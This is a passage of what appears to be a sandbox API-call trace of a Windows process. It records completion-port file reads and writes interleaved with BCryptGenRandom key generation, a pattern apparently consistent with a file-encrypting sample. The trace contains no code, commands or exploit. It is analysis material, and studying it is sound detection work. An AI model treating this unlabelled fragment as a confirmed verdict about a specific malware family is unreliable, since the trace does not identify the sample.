lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0082.374] WriteFile (in: hFile=0x3c4, lpBuffer=0x3d7007c*, nNumberOfBytesToWrite=0xc10, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048) returned 1 [0082.375] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0082.385] ReadFile (in: hFile=0x3b8, lpBuffer=0x2031f04, nNumberOfBytesToRead=0x11da, lpNumberOfBytesRead=0x0, lpOverlapped=0x2031ed0 | out: lpBuffer=0x2031f04*, lpNumberOfBytesRead=0x0, lpOverlapped=0x2031ed0) returned 1 [0082.398] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0082.413] WriteFile (in: hFile=0x3c0, lpBuffer=0x3db00ec, nNumberOfBytesToWrite=0xb10, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3db00b8 | out: lpBuffer=0x3db00ec, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3db00b8) returned 0x0 [0082.413] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0082.533] WriteFile (in: hFile=0x3b8, lpBuffer=0x1fb18f4, nNumberOfBytesToWrite=0x13b0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 0x0 [0082.534] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0082.545] CloseHandle (hObject=0x3ac) returned 1 [0082.546] free (_Block=0x1ff1e60) [0082.546] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0082.554] WriteFile (in: hFile=0x3c4, lpBuffer=0x2031f04*, nNumberOfBytesToWrite=0x1360, lpNumberOfBytesWritten=0x0, lpOverlapped=0x2031ed0 | out: lpBuffer=0x2031f04*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x2031ed0) returned 1 [0082.554] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0082.565] CloseHandle (hObject=0x3c0) returned 1 [0082.565] free (_Block=0x3d70048) [0082.565] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0082.572] WriteFile (in: hFile=0x3b4, lpBuffer=0x3db00ec*, nNumberOfBytesToWrite=0x6c90, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3db00b8 | out: lpBuffer=0x3db00ec*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3db00b8) returned 1 [0082.572] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0082.588] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0082.588] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0082.588] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0082.589] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0082.589] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0082.589] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0082.589] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0082.589] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0082.589] free (_Block=0x77d800) [0082.589] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1930 [0082.589] calloc (_Count=0x82, _Size=0x4) returned 0x1ff1a40 [0082.590] free (_Block=0x1ff1930) [0082.590] free (_Block=0x1ff1a40) [0082.590] free (_Block=0x77d908) [0082.590] WriteFile (in: hFile=0x3c0, lpBuffer=0x3d7007c, nNumberOfBytesToWrite=0x611, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048) returned 0x0 [0082.591] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0082.608] WriteFile (in: hFile=0x3c0, lpBuffer=0x3d7007c*, nNumberOfBytesToWrite=0xef0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048) returned 1 [0082.608] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0082.805] ReadFile (in: hFile=0x3bc, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x1197, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0082.806] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0082.806] CloseHandle (hObject=0x3bc) returned 1 [0082.812] free (_Block=0x1ff1e60) [0082.812] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0082.848] CloseHandle (hObject=0x3c4) returned 1 [0082.848] free (_Block=0x1fb18c0) [0082.848] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0082.851] ReadFile (in: hFile=0x3bc, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0xc0a, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0082.851] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0082.851] CloseHandle (hObject=0x3bc) returned 1 [0082.853] free (_Block=0x1ff1e60) [0082.853] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0082.876] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0082.877] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0082.877] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0082.877] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0082.878] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0082.878] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0082.878] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0082.878] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0082.878] free (_Block=0x77d800) [0082.878] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1930 [0082.878] calloc (_Count=0x82, _Size=0x4) returned 0x1ff1a40 [0082.879] free (_Block=0x1ff1930) [0082.879] free (_Block=0x1ff1a40) [0082.879] free (_Block=0x77d908) [0082.879] WriteFile (in: hFile=0x3bc, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0082.879] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0082.893] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0082.894] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0082.894] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0082.894] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0082.894] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0082.895] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0082.895] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0082.895] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0082.895] free (_Block=0x77d800) [0082.895] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1930 [0082.895] calloc (_Count=0x82, _Size=0x4) returned 0x1ff1a40 [0082.895] free (_Block=0x1ff1930) [0082.896] free (_Block=0x1ff1a40) [0082.896] free (_Block=0x77d908) [0082.896] WriteFile (in: hFile=0x3c4, lpBuffer=0x1ff1e94, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0082.896] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0082.904] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0082.904] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0082.905] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0082.905] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0082.906] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0082.906] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0082.909] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0082.909] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0082.909] free (_Block=0x77d800) [0082.909] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1930 [0082.909] calloc (_Count=0x82, _Size=0x4) returned 0x1ff1a40 [0082.910] free (_Block=0x1ff1930) [0082.910] free (_Block=0x1ff1a40) [0082.910] free (_Block=0x77d908) [0082.910] WriteFile (in: hFile=0x3c0, lpBuffer=0x2031f04, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x2031ed0 | out: lpBuffer=0x2031f04, lpNumberOfBytesWritten=0x0, lpOverlapped=0x2031ed0) returned 0x0 [0082.911] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0082.945] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0082.946] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0082.946] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0082.946] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0082.946] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0082.946] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0082.950] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0082.950] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0082.950] free (_Block=0x77d800) [0082.950] calloc (_Count=0x41, _Size=0x4) returned 0x2071f40 [0082.950] calloc (_Count=0x82, _Size=0x4) returned 0x2072050 [0082.950] free (_Block=0x2071f40) [0082.950] free (_Block=0x2072050) [0082.950] free (_Block=0x77d908) [0082.950] WriteFile (in: hFile=0x3b4, lpBuffer=0x3d7007c, nNumberOfBytesToWrite=0x617, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048) returned 0x0 [0082.951] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0082.960] ReadFile (in: hFile=0x3b8, lpBuffer=0x3db00ec, nNumberOfBytesToRead=0x84, lpNumberOfBytesRead=0x0, lpOverlapped=0x3db00b8 | out: lpBuffer=0x3db00ec, lpNumberOfBytesRead=0x0, lpOverlapped=0x3db00b8) returned 0x0 [0082.961] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0082.976] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0082.977] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0082.977] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0082.977] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0082.978] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0082.978] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0082.981] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0082.981] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0082.981] free (_Block=0x77d800) [0082.981] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1930 [0082.981] calloc (_Count=0x82, _Size=0x4) returned 0x1ff1a40 [0082.982] free (_Block=0x1ff1930) [0082.982] free (_Block=0x1ff1a40) [0082.982] free (_Block=0x77d908) [0082.982] WriteFile (in: hFile=0x3a0, lpBuffer=0x3df015c, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0128 | out: lpBuffer=0x3df015c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0128) returned 0x0 [0082.983] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0082.996] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0082.996] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0082.997] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0082.997] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0082.997] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0082.998] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0082.998] calloc (_Count=0x40, _Size=0x4) returned 0x3df0008 [0082.998] calloc (_Count=0x41, _Size=0x4) returned 0x77d800 [0082.998] free (_Block=0x3df0008) [0082.998] calloc (_Count=0x41, _Size=0x4) returned 0x3df0008 [0082.998] calloc (_Count=0x82, _Size=0x4) returned 0x1ff1930 [0082.998] free (_Block=0x3df0008) [0082.998] free (_Block=0x1ff1930) [0082.999] free (_Block=0x77d800) [0082.999] WriteFile (in: hFile=0x3bc, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0082.999] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0084.261] CloseHandle (hObject=0x3a0) returned 1 [0084.262] free (_Block=0x3d70048) [0084.262] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0084.268] CloseHandle (hObject=0x3c0) returned 1 [0084.268] free (_Block=0x1ff1e60) [0084.268] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0084.269] CloseHandle (hObject=0x3b8) returned 1 [0084.269] free (_Block=0x1fb18c0) [0084.269] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0084.271] WriteFile (in: hFile=0x3bc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x33c0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0084.271] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0084.719] ReadFile (in: hFile=0x3b4, lpBuffer=0x2031f04, nNumberOfBytesToRead=0x1681, lpNumberOfBytesRead=0x0, lpOverlapped=0x2031ed0 | out: lpBuffer=0x2031f04*, lpNumberOfBytesRead=0x0, lpOverlapped=0x2031ed0) returned 1 [0084.720] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0084.738] ReadFile (in: hFile=0x3b4, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0x1fe9, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 1 [0084.739] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0084.739] CloseHandle (hObject=0x3b4) returned 1 [0084.743] free (_Block=0x1fb18c0) [0084.743] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0084.755] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0084.755] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0084.755] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0084.756] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0084.756] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0084.756] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0084.756] calloc (_Count=0x40, _Size=0x4) returned 0x1ff1e60 [0084.756] calloc (_Count=0x41, _Size=0x4) returned 0x77d800 [0084.756] free (_Block=0x1ff1e60) [0084.756] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1e60 [0084.756] calloc (_Count=0x82, _Size=0x4) returned 0x1ff1930 [0084.757] free (_Block=0x1ff1e60) [0084.757] free (_Block=0x1ff1930) [0084.757] free (_Block=0x77d800) [0084.757] WriteFile (in: hFile=0x3b4, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0x612, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0084.757] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0084.758] WriteFile (in: hFile=0x3b4, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0x6440, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0084.758] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0084.759] CloseHandle (hObject=0x3b4) returned 1 [0084.759] free (_Block=0x1fb18c0) [0084.759] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0084.768] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0084.769] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0084.769] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0084.769] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0084.769] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0084.769] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0084.769] calloc (_Count=0x40, _Size=0x4) returned 0x1ff1e60 [0084.769] calloc (_Count=0x41, _Size=0x4) returned 0x77d800 [0084.770] free (_Block=0x1ff1e60) [0084.770] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1e60 [0084.770] calloc (_Count=0x82, _Size=0x4) returned 0x1ff1930 [0084.770] free (_Block=0x1ff1e60) [0084.770] free (_Block=0x1ff1930) [0084.770] free (_Block=0x77d800) [0084.770] WriteFile (in: hFile=0x3b4, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0x61a, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0084.771] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0084.772] WriteFile (in: hFile=0x3b4, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0x1820, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 